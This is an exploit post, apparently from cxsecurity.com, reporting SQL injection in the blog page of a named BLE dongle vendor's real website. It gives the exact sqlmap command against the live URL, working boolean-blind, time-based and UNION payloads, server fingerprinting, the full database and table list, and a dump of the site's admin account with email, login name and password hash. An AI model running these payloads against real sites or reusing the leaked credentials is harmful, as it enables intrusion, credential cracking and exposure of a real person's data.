Bluetooth Low Energy (BLE) USB Dongle | SQL Injection

2021.07.21
0x01369 (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: BleuIO - Bluetooth Low Energy (BLE) USB Dongle | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://www.bleuio.com/blog/details.php?id=932" --dbs --batch
---------------------------------------------------------------------------------------------------
.com Commercial BleuIO - Bluetooth Low Energy (BLE) USB Dongle
https://www.bleuio.com/blog/details.php?id=932
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=932 AND 4987=4987

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=932 AND (SELECT 7660 FROM (SELECT(SLEEP(5)))zddA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-6397 UNION ALL SELECT NULL,NULL,CONCAT(0x716b787671,0x745168597449744c6279465a6a574f7a7846646c686148795171645856615567797a70544e41764f,0x7176707a71),NULL,NULL-- -
---
the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
the back-end DBMS operating system: Linux Ubuntu
the back-end DBMS: MySQL >= 5.0.12
banner: '5.7.33-0ubuntu0.18.04.1'
available databases [3]:
[+] information_schema
[+] smart_db05
[+] test

Database: smart_db05
[24 tables]
+----------------------------+
| ssd_aiowps_events          |
| ssd_aiowps_failed_logins   |
| ssd_aiowps_global_meta     |
| ssd_aiowps_login_activity  |
| ssd_aiowps_login_lockdown  |
| ssd_aiowps_permanent_block |
| ssd_commentmeta            |
| ssd_comments               |
| ssd_links                  |
| ssd_options                |
| ssd_postmeta               |
| ssd_posts                  |
| ssd_redirection_404        |
| ssd_redirection_groups     |
| ssd_redirection_items      |
| ssd_redirection_logs       |
| ssd_term_relationships     |
| ssd_term_taxonomy          |
| ssd_termmeta               |
| ssd_terms                  |
| ssd_usermeta               |
| ssd_users                  |
| ssd_yoast_seo_links        |
| ssd_yoast_seo_meta         |
+----------------------------+

Database: smart_db05
Table: ssd_users
[1 entry]
+----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | <blank>  | $P$BVCY5ZyykfMnm8e4Qr4zIM2vdvborE/ | shuhadz@hotmail.com | ssdAdmin   | 0           | ssdAdmin     | ssdadmin      | 2020-03-23 10:10:38 | <blank>             |
+----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

Copyright 2021, cxsecurity.com

 
